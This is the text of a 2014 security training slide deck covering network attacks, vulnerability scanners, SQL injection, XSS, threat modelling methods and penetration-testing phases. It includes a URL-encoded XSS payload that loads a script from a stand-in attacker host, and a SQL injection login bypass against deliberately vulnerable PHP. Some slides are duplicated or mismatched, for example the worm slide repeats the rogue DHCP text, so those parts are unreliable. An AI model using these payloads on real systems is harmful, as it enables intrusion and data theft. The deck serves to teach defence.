Security Concepts - Network Security Threats and Vulnerability Application, Data and Host Security Security Threat Modelling Penetration Testing

1. SECURITY CONCEPTS
Dec 2014

2. • According to the Internet Storm Center (http://isc.sans.org),a computer
connected to the Internet has an average of 5 minutesbefore it falls under some
form of attack.

3. CURRENT STATISTICS
• http://securelist.com/statistics/

5. AGENDA:
1. Network Security
2. Threats and Vulnerability
3. Application, Data and Host Security
4. Security Threat Modelling
5. Penetration Testing

6. 1. NETWORK SECURITY

7. NETWORK SECURITY PRINCIPLE
• Confidentiality: only sender, intended receiver should “understand” message
contents
o sender encrypts message
o receiver decrypts message
• Authentication: sender, receiver want to confirm identity of each other
• Message Integrity: sender, receiver want to ensure message not altered (in
transit, or afterwards) without detection
• Access and Availability: services must be accessible and available to users

8. NETWORK SECURITY THREATS

9. FRIENDS AND ENEMIES: ALICE, BOB, TRUDY
• well-known in network security world
• Bob, Alice (lovers!) want to communicate “securely”
• Trudy (intruder) may intercept, delete, add messages
secure
sender
secure
receiver
channel data, control
messages
data data
Alice Bob
Trudy
data

10. 8-
Who might Bob, Alice be?
• … well, real-life Bobs and Alices!
• Web browser/server for electronic transactions (e.g., on-line
purchases)
• on-line banking client/server
• DNS servers
• routers exchanging routing table updates
• other examples?

12. 8-

13. PRIVILEGE ESCALATION

14. APPLICATION LAYER ATTACK – LAYER 7
• HTTP: Virus, Worms, SQLInjection, XSS
• Malware: Trojans, Backdoors

15. SNIFFER ATTACK
• Wireshark
• CAIN and Abel
• TCPdump
• Kismet
• Dsniff
• etthercap
• Paros Proxy, Burp
proxy

16. MAN IN THE MIDDLE ATTACK

17. DOS ATTACK

18. DOS ATTACK TOOLS
• Jolt2
• Bubonic.c
• Land and LaTierra
• Targa
• Blast20
• Nemesy
• Panther2
• CrazyPinger
• Some Trouble
• UDP Flood
• FSM
• FSMax

19. REFLECTION DOS
The attacking machines send out huge volumes of SYN packets
but with the IP source address pointing to the target machine.

20. SMURF ATTACK

21. MANGLE – INVALID PACKET ATTACK
Tools to simulate Invalid Packet attack
• Nmap
• Nessus
Tools to handle this
• Iptables(linux)
• Checkpoint
• Netfilter
• Application need to handle this

22. DDOS ATTACK

23. SYN FLOOD

24. TCP ATTACK
• Send multiple TCP Reset packet

25. UDP ATTACK

26. BOTNET
• Exploit the system and make it botclient->Make
botnet server aware it has joined botnet->Install Anti-
anti virus module->Listen to botnet server for instruction

27. BUFFER OVERFLOW
A flaw that occurs when more data is written to a block of memory, or
buffer, than the buffer is allocated to hold.

28. ROGUE DHCP SERVER
• Malicious software in the network
• A type of Man in middle attack
• Installed using rootkit
• Will spoof data, make network slow and create
network problems

29. EAVESDROPPING
• Eavesdropping is secretly listening to the private
conversation of others without their consent, as defined
by Black's Law Dictionary.
• Unencrypted open wifi network
• Tool: Firesheep

30. SOCIAL ENGINEERING ATTACK
• Phishing is a technique of fraudulently obtaining private
information. Typically, the phisher sends an e-mail that
appears to come from a legitimate business—a bank, or
credit card company—requesting "verification" of
information and warning of some dire consequences if it is
not provided.
• Phone phishing uses a rogue IVR system to recreate a
legitimate-sounding copy of a bank or other institution's
IVR system.
• Baiting is like the real-world Trojan Horse that uses physical
media and relies on the curiosity or greed of the victim.
• Shoulder surfing involves observing an employee's private
information over their shoulder. This type of attack is
common in public places such as airports, airplanes or
coffee shops.

31. WORM
• Malicious software in the network
• A type of Man in middle attack
• Installed using rootkit
• Will spoof data, make network slow and create
network problems

32. ROOTKIT
A rootkit is a stealthy type of software, typically malicious, designed
to hide the existence of certain processes or programs from normal
methods of detection and enable continued privileged access to a
computer.

33. MAC FLOODING - ARP
In a typical MAC flooding attack, a switch is fed
many Ethernet frames, each containing different
source MAC addresses, by the attacker. The
intention is to consume the limited memory set
aside in the switch to store the MAC address table.
Tool: dsniff

34. DNS CACHE POISONING
DNS spoofing (or DNS cache poisoning) is a computer
hacking attack, whereby data is introduced into a Domain
Name System (DNS) resolver's cache, causing the name
server to return an incorrect IP address, diverting traffic to the
attacker's computer (or any other computer).

35. URL ENCODING OR CANONICALIZATION
Canonicalization is when a resource can be represented in more
than one manner.
Canonicalization of URLs occurs in a similar manner where
http://doman.tld/user/foo.gif and
http://domain.tld/user/bar/../foo.gif would represent the same
image file
Results in XSS and SQL Injection attack.
Cross-Site Scripting
Excerpt from an arbitrary web page - “getdata.php”: echo $HTTP_GET_VARS[“data”];
URL-Encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f
www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e
HTML execution: <script src=”http://www.badplace.com/nasty.js”></script>
cheat sheet

36. PACKET TAPPING
• Hardware to monitor packet
• vssmonitoring.com

37. MIME HEADER PARSING
• Several Win32 mass mailers send themselves via an email with
a MIME encoded malicious executable with a malformed
header, and the executable will silently execute unbeknownst
to the user.
• This occurs whenever Internet Explorer parses the mail and
thus can happen when simply reading or previewing email.
Thus, email worms can spread themselves without any user
actually executing or detaching a file.
http://www.kb.cert.org/vuls/id/980499

38. PACKET TAPPING
• Hardware to monitor packet
• vssmonitoring.com

39. REPLAY ATTACK
• A replay attack (also known as playback attack) is a form of network
attack in which a valid data transmission is maliciously or fraudulently
repeated or delayed.

40. KEYLOGGER
• Keystroke logging, often referred to as keylogging or keyboard
capturing, is the action of recording (or logging) the keys struck on a
keyboard
• There are numerous keylogging methods, ranging from hardware
and software-based.

41. 2. THREATS AND
VULNERABILITIES

44. TOP 10 VULNERABILITY SCANNER TOOLS
1. Nessus
2. openVAS
3. Core Impact
4. Nexpose
5. GFI Languard
6. Qualysguard
7. MBSA
8. Retina
9. Secunia
10. SAINT

45. VULNERABILITY RESEARCH WEBSITES
• http://www.kb.cert.org/vuls
• www.securitytracker.com
• www.microsoft.com/security
• www.securiteam.com
• www.packetstormsecurity.com
• www.hackerstorm.com
• www.hackerwatch.org
• www.securityfocus.com
• www.securitymagazine.com

46. VULNERABILITY SEARCH
• https://web.nvd.nist.gov/view/vuln/search

47. SOFTWARE EXPLOITATION
• Database
• Email
• Spyware – Join MS spynet using Windows
defender
• Rootkits -
http://www.liutilities.com/products/wintasks
pro/processlibrary.

48. SURVIVING MALICIOUS CODE
• Viruses
• Trojan Horses
• Logic Bombs
• Worms
• Antivirus Software

49. ATTACK
• Access attack – Dumpster diving,
Eavesdropping, Snooping, Interception
• Modification and Repudiation attack
• DOS attack – ping of death, buffer overflow
• Botnets - http://www.microsoft.com/security/sir

50. COMMON ATTACKS
• Backdoor
• Spoofing
• Phishing
• Man-In-Middle attack
• Replay attack
• Password guessing
• Privilege escalation

51. 3. APPLICATION, DATA AND HOST
SECURITY

52. APPLICATION AND DATA SECURITY
• Web Application
• OWASP Top 10 -
https://www.owasp.org/index.php/OWASP_Top_Ten_Che
at_Sheet
• Hacking Tools: Instant Source, Wget,WebSleuth
BlackWidow,WindowBomb,Burp,cURL

53. SQL – TABLE NAME USERS
Name Age Email Password City
Ram 35 ram@abc.co
m
ram@123 Bangalore
Krishna 24 Krishna@nec.
com
098kkk Mysore
Parul 20 parul@gmail.
com
Pp234 chennai
Select age from users where name=‘Parul’;
Update users set email=‘ram@gmail.ocm’ where name=Ram;-- This is
comment
INSERT into users values (‘Puja’, 30, ‘puja@gmail.com’,’ppp123’,’Ooty’);
DROP TABLE users;
e.g PHP code
$result = mysql_query(“select * from users where(name=‘$user’ and
password=‘$pass’);”);
Add username as Bina’ OR 1=1);--
$result = mysql_query(“select * from users where(name=‘Bina’ OR 1=1);-- and
password=‘junkvalue’);”);

54. SQL INJECTION STATISTICS
http://web.nvd.nist.gov/view/vuln/statistics

55. SQL INJECTION COUNTERMEASURES
• Input validation
– Check it is in valid format - whitelisting
– Input Sanitization
 Blacklisting-avoid ‘ ; --
 Escaping problematic chars
 Use Prepared statements
$db=new mysql(“localhost”,”Sita”,”ssttpass”,”DB”);
$statement=$db->prepare(“select * from users
where(name=? And password=?);”);
$statement->bind_param(“ss”,$user, $pass);
$statement->execute();

56. CROSS SITE SCRIPTING

57. XSS
• Stored XSS
– Bad website->send malicious script to genuine web
server
– Client access genuine web server
– Run malicious script and sends data to attacker
• Reflected XSS attack
• Echoed input
• Prevention: Input validation

58. 4. SECURITY THREAT MODELING

59. IMPORTANT KEYWORDS
• Threat Model
• Asset
• Threat
• Attack
• Attacker
• Impact
• Probability
• Mitigation
• Subject

60. IMPORTANT KEYWORDS CONTD…
• Object
• Action
• Intended Action
• Unintended Action
• Trust Boundary
• Subject/Object Matrix
• Actor/Action Matrix
• Data Flow Diagram
• Attack Tree
• IT Audit

61. THREAT MODELING
• Formal method to identify and enumerate risk
• Make informed risk decisions in regards to
– Actions
– Threats
– Mitigation against risk

62. WHAT CAN BE THREAT MODELED?
• Applications/ Software
• Systems
• Policies and Procedure
• Business Processes
• Anything….

63. WHEN TO DO THREAT MODELING
• Should be part of SDL
• Should be Iterative Process
• Whenever changes are made

64. RISK MANAGEMENT
• Risk Identification – incidents, bug reports,
testing
• Risk Enumeration & Classification – impact,
how and when it can occur, nature of risk
• Mitigation identification – cost benefit analysis
• Mitigation testing – Penetration testing, Third
party design review, procedural review and
management signoff, Legal review

65. THREAT MODEL PROCESS OVERVIEW
• Define Use Scenarios
• Define Security Assumptions
• Create/Update data flow diagram
• System Decomposition
• Identify Threats
• Determine Risks
• Plan Mitigations
• Iterate Threat Model

66. THREAT MODEL PROCESS METHODOLOGIES
• Microsoft STRIDE/DREAD
• NSA’s InfoSec Assessment Methodlogy
• CERT’s Octave

67. STRIDE
• Spoofing
• Tempering
• Repudiation
• Information Disclosure
• Denial of Service
• Escalation of Privilege

68. DREAD
• Damage Potential
• Reproducibility
• Exploitability
• Affected Users
• Discoverability

69. IAM
• Designed by NSA
• Used by US Federal Government
• Assessment broken into 10 different areas
• Designed to assess the risk of automated
information systems that support infra
• Highly detailed and rigid process
http://csrc.nist.gov/publications/PubsSPs.html#800-30
http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf

70. OCTAVE
• Originates from Carnegie Mellon University’s
S/W engg institute in collaboration with CERT
• Focusses on Org risk not technical
• OCTAVE for large org and OCTAVE-S for small
org.
http://www.cert.org/octave/

71. MS THREAT MODELING TOOL
• Based on CIA methodology
• Comprehensive attack library
• Contain helpful advanced features
http://www.microsoft.com/en-in/download/confirmation.aspx?id=42518
http://msdn.microsoft.com/en-us/library/ff649779.aspx

72. 5. PENETRATION TESTING

73. THREE PRE TEST PHASES
• Footprinting:
– Whois(internic.net), Smartwhois, nslookup
– Check company webpage, contact, location, numbers,
www.archive.org, whatismyip.com
– Employee blogs, Job boards
• Scanning
– Identifying active systems
– Discover open ports and access points
– Fingerprinting the OS
– Uncovering services on ports
Tools-> nmap, ping, traceroute, netcat

74. THREE PRE TEST PHASES CONTD….
• Enumerating
– Identify user accounts
– discover NetBIOS name with Nbtscan
– SNMPutil for SNMP
– Windows DNS query
– Establishing Null session
Tools->
Vulnerability Scanner: Retina, SAINT
Password Crackers: Brutus

75. IMPORTANT URLS
• Privilege Escalation: http://blog.spiderlabs.com/2012/12/my-5-top-ways-to-
escalate-privileges.html
• Sniffer Tools : http://sectools.org/tag/sniffers/

76. DEFENDING REPUTATION ON INTERNET
• http://www.defendmyname.com
• http://www.reputationdefender.com
• http://www.visibletechnologies.com

77. REFERENCES
• Google
• Old training Materials
• Wikipedia
• Security books

78. BACKUP

79. a %61 backspace %08 : %3A
b %62 tab %09 ; %3B
c %63 linefeed %0A < %3C
d %64 creturn %0D = %3D
e %65 space %20 > %3E
f %66 ! %21 ? %3F
g %67 " %22 @ %40
h %68 # %23 A %41
i %69 $ %24 B %42
j %6A % %25 C %43
k %6B & %26 D %44
l %6C ' %27 E %45
m %6D ( %28 F %46
n %6E ) %29 G %47
o %6F * %2A H %48
p %70 + %2B I %49
q %71 , %2C J %4A
r %72 - %2D K %4B
s %73 . %2E L %4C
t %74 / %2F M %4D
u %75 0 %30 N %4E
v %76 1 %31 O %4F
w %77 2 %32 P %50
x %78 3 %33 Q %51
y %79 4 %34 R %52
z %7A 5 %35 S %53
{ %7B 6 %36 T %54
| %7C 7 %37 U %55
} %7D 8 %38 V %56
~ %7E 9 %39 W %57
X %58
Y %59
Z %5A
[ %5B
%5C
] %5D
^ %5E
_ %5F
` %60